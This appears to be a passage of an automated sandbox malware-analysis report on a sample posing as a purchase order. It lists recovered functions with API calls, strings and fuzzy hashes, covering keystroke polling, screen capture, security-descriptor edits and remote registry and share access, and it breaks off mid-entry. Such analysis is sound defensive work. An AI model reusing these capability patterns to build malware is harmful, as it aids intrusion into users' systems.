                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                      • String ID: 0
                      • API String ID: 1296962147-4108050209
                      • Opcode ID: cbf6d358f5527c86ea12703166cbaf2199b4c72663ae522c8eec9132c2bf6c2e
                      • Instruction ID: 0cd1c3b9a94ba6af080aeabe5447e04691a8265cbcf656c6031383d291f86816
                      • Opcode Fuzzy Hash: cbf6d358f5527c86ea12703166cbaf2199b4c72663ae522c8eec9132c2bf6c2e
                      • Instruction Fuzzy Hash: E0817E71208309AFD720DF54D884ABBBBE9FB88754F00496DFA95972A1D730DD05CB62
                      Function 00ACB593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00ACB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00ACB903
                        • Part of subcall function 00ACB8E7: GetLastError.KERNEL32(?,00ACB3CB,?,?,?), ref: 00ACB90D
                        • Part of subcall function 00ACB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00ACB3CB,?,?,?), ref: 00ACB91C
                        • Part of subcall function 00ACB8E7: HeapAlloc.KERNEL32(00000000,?,00ACB3CB,?,?,?), ref: 00ACB923
                        • Part of subcall function 00ACB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00ACB93A
                        • Part of subcall function 00ACB982: GetProcessHeap.KERNEL32(00000008,00ACB3E1,00000000,00000000,?,00ACB3E1,?), ref: 00ACB98E
                        • Part of subcall function 00ACB982: HeapAlloc.KERNEL32(00000000,?,00ACB3E1,?), ref: 00ACB995
                        • Part of subcall function 00ACB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ACB3E1,?), ref: 00ACB9A6
                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ACB5F7
                      • _memset.LIBCMT ref: 00ACB60C
                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ACB62B
                      • GetLengthSid.ADVAPI32(?), ref: 00ACB63C
                      • GetAce.ADVAPI32(?,00000000,?), ref: 00ACB679
                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ACB695
                      • GetLengthSid.ADVAPI32(?), ref: 00ACB6B2
                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ACB6C1
                      • HeapAlloc.KERNEL32(00000000), ref: 00ACB6C8
                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ACB6E9
                      • CopySid.ADVAPI32(00000000), ref: 00ACB6F0
                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ACB721
                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ACB747
                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ACB75B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                      • String ID:
                      • API String ID: 3996160137-0
                      • Opcode ID: 3172c8ac9f7e775efc2ab83e5b8805615ae4e263a5666041c8d58a60fbe1afe5
                      • Instruction ID: c347d4fb0ad9dfbb0b30989e6cdef3da066a5412d7eda891ce061c47a64ec033
                      • Opcode Fuzzy Hash: 3172c8ac9f7e775efc2ab83e5b8805615ae4e263a5666041c8d58a60fbe1afe5
                      • Instruction Fuzzy Hash: D2515A75910209ABDF00DFA4DD8AEEEBB79FF48304F04816DE915A7290DB369A05CB60
                      Function 00AEA268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetDC.USER32(00000000), ref: 00AEA2DD
                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00AEA2E9
                      • CreateCompatibleDC.GDI32(?), ref: 00AEA2F5
                      • SelectObject.GDI32(00000000,?), ref: 00AEA302
                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00AEA356
                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00AEA392
                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00AEA3B6
                      • SelectObject.GDI32(00000006,?), ref: 00AEA3BE
                      • DeleteObject.GDI32(?), ref: 00AEA3C7
                      • DeleteDC.GDI32(00000006), ref: 00AEA3CE
                      • ReleaseDC.USER32(00000000,?), ref: 00AEA3D9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                      • String ID: (
                      • API String ID: 2598888154-3887548279
                      • Opcode ID: 19f731267b539a85e12639493b3e1e1df4b6524ce9f0bca58e974624be65a52d
                      • Instruction ID: 7e12eea70d29fb97d65d5db281b7e86ad47eacc99c0d873277a97bd39596812c
                      • Opcode Fuzzy Hash: 19f731267b539a85e12639493b3e1e1df4b6524ce9f0bca58e974624be65a52d
                      • Instruction Fuzzy Hash: 63515875900349EFCB14CFA9DC85EAEBBB9EF48310F14881DF99AA7210C731A8418B60
                      Function 00ADD520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                      Download Yara Rule
                      APIs
                      • LoadStringW.USER32(00000066,?,00000FFF), ref: 00ADD567
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 00ADD589
                      • __swprintf.LIBCMT ref: 00ADD5DC
                      • _wprintf.LIBCMT ref: 00ADD68D
                      • _wprintf.LIBCMT ref: 00ADD6AB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: LoadString_wprintf$__swprintf_memmove
                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                      • API String ID: 2116804098-2391861430
                      • Opcode ID: cce9194433887b59af17cb0d3f38847d2387a6ceefe71e6eb598898cf6360400
                      • Instruction ID: dda19d6112b21521fc7f82f7aacf0bafb57a92d839e2f71a9cb652d75b911b17
                      • Opcode Fuzzy Hash: cce9194433887b59af17cb0d3f38847d2387a6ceefe71e6eb598898cf6360400
                      • Instruction Fuzzy Hash: D0517172900209BACF15EBA0DE42EEEB7F9EF14700F104566F106B21A1EE715F58DBA1
                      Function 00ADD338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                      Download Yara Rule
                      APIs
                      • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00ADD37F
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00ADD3A0
                      • __swprintf.LIBCMT ref: 00ADD3F3
                      • _wprintf.LIBCMT ref: 00ADD499
                      • _wprintf.LIBCMT ref: 00ADD4B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: LoadString_wprintf$__swprintf_memmove
                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                      • API String ID: 2116804098-3420473620
                      • Opcode ID: 88823b357eb53fb2a3cf8fd448235266c4d4168cd597e7dd666aeda800950004
                      • Instruction ID: e10945958a5c033d93df6e23fe3460500822253ccd9abf0d78e6d167115b7650
                      • Opcode Fuzzy Hash: 88823b357eb53fb2a3cf8fd448235266c4d4168cd597e7dd666aeda800950004
                      • Instruction Fuzzy Hash: 4351A372900209AACF15EBA0DE42EEEB7B9EF14700F144466F106B21A1EB756F58DB61
                      Function 00ACAEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                      • _memset.LIBCMT ref: 00ACAF74
                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00ACAFA9
                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00ACAFC5
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00ACAFE1
                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00ACB00B
                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00ACB033
                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00ACB03E
                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00ACB043
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                      • API String ID: 1411258926-22481851
                      • Opcode ID: 6edc6b6595e2efcbf87267926ae55b9d48eef976d7e7de6187622d9a38460f06
                      • Instruction ID: 79b5bb438afeae8b7db167b757ccddfb2938232d928ef06d89bcf218343860c6
                      • Opcode Fuzzy Hash: 6edc6b6595e2efcbf87267926ae55b9d48eef976d7e7de6187622d9a38460f06
                      • Instruction Fuzzy Hash: 70410876D1022DAACF11EBA4DC95DEEB7B8BF18704F404069F901A3161EB719E04CFA1
                      Function 00AF3AF7 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                      Download Yara Rule
                      APIs
                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                      • API String ID: 3964851224-909552448
                      • Opcode ID: e259e6fed68bd2c8fc0da7993999878b04d40d764a134d9503a81ca696e2803b
                      • Instruction ID: 81a9eb2ce843a572122a4d8c78cc3da26f205848cc7d9217377255503f31d5a5
                      • Opcode Fuzzy Hash: e259e6fed68bd2c8fc0da7993999878b04d40d764a134d9503a81ca696e2803b
                      • Instruction Fuzzy Hash: B541913610024A8FCF08EF94D941BFA33A1BF2A390F1448A4FD515B295DB34DE2ADB60
                      Function 00AD83D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00AD843F
                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00AD8455
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AD8466
                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AD8478
                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00AD8489
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: SendString$_memmove
                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                      • API String ID: 2279737902-1007645807
                      • Opcode ID: 1b01cc1d18cc2cf60b9ba21a78420f77542ea10fc7224357373353fabe50e525
                      • Instruction ID: cd764edfa8497d3390b3e14e0bd3d1915423e1e98cf1413887df6dc20da8900e
                      • Opcode Fuzzy Hash: 1b01cc1d18cc2cf60b9ba21a78420f77542ea10fc7224357373353fabe50e525
                      • Instruction Fuzzy Hash: 181194A1B5015979DB20A7A1DC4ADFF7BFCEF91F00F48046AB412A21D1DEA05F44C6B1
                      Function 00AD8097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • timeGetTime.WINMM ref: 00AD809C
                        • Part of subcall function 00AAE3A5: timeGetTime.WINMM(?,75A8B400,00B06163), ref: 00AAE3A9
                      • Sleep.KERNEL32(0000000A), ref: 00AD80C8
                      • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00AD80EC
                      • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00AD810E
                      • SetActiveWindow.USER32 ref: 00AD812D
                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00AD813B
                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00AD815A
                      • Sleep.KERNEL32(000000FA), ref: 00AD8165
                      • IsWindow.USER32 ref: 00AD8171
                      • EndDialog.USER32(00000000), ref: 00AD8182
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                      • String ID: BUTTON
                      • API String ID: 1194449130-3405671355
                      • Opcode ID: fcdecebcbc7157e7bfc9324b2072e0335d0be586c2e70fb68cfcd9793c6a2c2f
                      • Instruction ID: d186450afa2af3599369ab978ba659f2cd0e6d6af900476ff2265f6ad2a2e084
                      • Opcode Fuzzy Hash: fcdecebcbc7157e7bfc9324b2072e0335d0be586c2e70fb68cfcd9793c6a2c2f
                      • Instruction Fuzzy Hash: E721A170200305BFE7225B22EC89B763BAAF718BCAB444256F50283361CF764E099611
                      Function 00AD32B0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 72windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B03C64,00000010,00000000,Bad directive syntax error,00B2DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00AD32D1
                      • LoadStringW.USER32(00000000,?,00B03C64,00000010), ref: 00AD32D8
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • _wprintf.LIBCMT ref: 00AD3309
                      • __swprintf.LIBCMT ref: 00AD332B
                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00AD3395
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                      • API String ID: 1506413516-4153970271
                      • Opcode ID: 7244d62d1458276b329e6612e6c97411e55e9bd799db8e233b72b3f6c9acb563
                      • Instruction ID: 61a47173e078c4005113035a9d2fecb1c52345f8c2aa1b70a38a889bb8ea060f
                      • Opcode Fuzzy Hash: 7244d62d1458276b329e6612e6c97411e55e9bd799db8e233b72b3f6c9acb563
                      • Instruction Fuzzy Hash: A9215132940219BBCF11EF90CD0AFEE77B9BF14700F044456F516A60A2DA75AB54DB51
                      Function 00AD78EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                      • String ID: 0.0.0.0
                      • API String ID: 208665112-3771769585
                      • Opcode ID: 2371906cc6a17a89778b5011a80c105fe2f8ba1a9b6d986c4f2e06dde8436b75
                      • Instruction ID: ace51dd46e0381cf2b0c70c075fa069e7a63211f57119b308da9c39f2c102d8d
                      • Opcode Fuzzy Hash: 2371906cc6a17a89778b5011a80c105fe2f8ba1a9b6d986c4f2e06dde8436b75
                      • Instruction Fuzzy Hash: 3D112432A08125AFCB29AB709D5AEEE37BCDF00720F4040A6F05692191FF70DF8086A0
                      Function 00AE08D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                      • String ID:
                      • API String ID: 3566271842-0
                      • Opcode ID: 00c1df3f632360ffdd6058902e5922031699ae25c47ea19603197c10bb62e7b0
                      • Instruction ID: a7c406b7cc63a7b8252ae11aaa4cd71e0daa145d3ad6685034346d49f663c653
                      • Opcode Fuzzy Hash: 00c1df3f632360ffdd6058902e5922031699ae25c47ea19603197c10bb62e7b0
                      • Instruction Fuzzy Hash: 3C711D75A00219AFDB10DFA5C984EDEB7B9FF48350F048495E919AB252DB74EE40CF90
                      Function 00AD388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • GetKeyboardState.USER32(?), ref: 00AD3908
                      • SetKeyboardState.USER32(?), ref: 00AD3973
                      • GetAsyncKeyState.USER32(000000A0), ref: 00AD3993
                      • GetKeyState.USER32(000000A0), ref: 00AD39AA
                      • GetAsyncKeyState.USER32(000000A1), ref: 00AD39D9
                      • GetKeyState.USER32(000000A1), ref: 00AD39EA
                      • GetAsyncKeyState.USER32(00000011), ref: 00AD3A16
                      • GetKeyState.USER32(00000011), ref: 00AD3A24
                      • GetAsyncKeyState.USER32(00000012), ref: 00AD3A4D
                      • GetKeyState.USER32(00000012), ref: 00AD3A5B
                      • GetAsyncKeyState.USER32(0000005B), ref: 00AD3A84
                      • GetKeyState.USER32(0000005B), ref: 00AD3A92
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: State$Async$Keyboard
                      • String ID:
                      • API String ID: 541375521-0
                      • Opcode ID: 63b7b0ddd85a5a95a4e80c76f03b394df152bb4c30314dd7dea18bac57ba9712
                      • Instruction ID: 3c3fdd19e3ae88a012e303b87e51ce094378375a641af77879ef4fe13904e072
                      • Opcode Fuzzy Hash: 63b7b0ddd85a5a95a4e80c76f03b394df152bb4c30314dd7dea18bac57ba9712
                      • Instruction Fuzzy Hash: 8051B562A0478429FF35EBA489117EEBBB45F01380F48859BD5C3562C2DAA49B8CC763
                      Function 00ACFAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                      Download Yara Rule
                      APIs
                      • GetDlgItem.USER32(?,00000001), ref: 00ACFB19
                      • GetWindowRect.USER32(00000000,?), ref: 00ACFB2B
                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00ACFB89
                      • GetDlgItem.USER32(?,00000002), ref: 00ACFB94
                      • GetWindowRect.USER32(00000000,?), ref: 00ACFBA6
                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00ACFBFC
                      • GetDlgItem.USER32(?,000003E9), ref: 00ACFC0A
                      • GetWindowRect.USER32(00000000,?), ref: 00ACFC1B
                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00ACFC5E
                      • GetDlgItem.USER32(?,000003EA), ref: 00ACFC6C
                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00ACFC89
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00ACFC96
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$ItemMoveRect$Invalidate
                      • String ID:
                      • API String ID: 3096461208-0
                      • Opcode ID: 6b63100cc59268745834d93ee9fbb202fb1c2c5cffcf428f852ba944a044b262
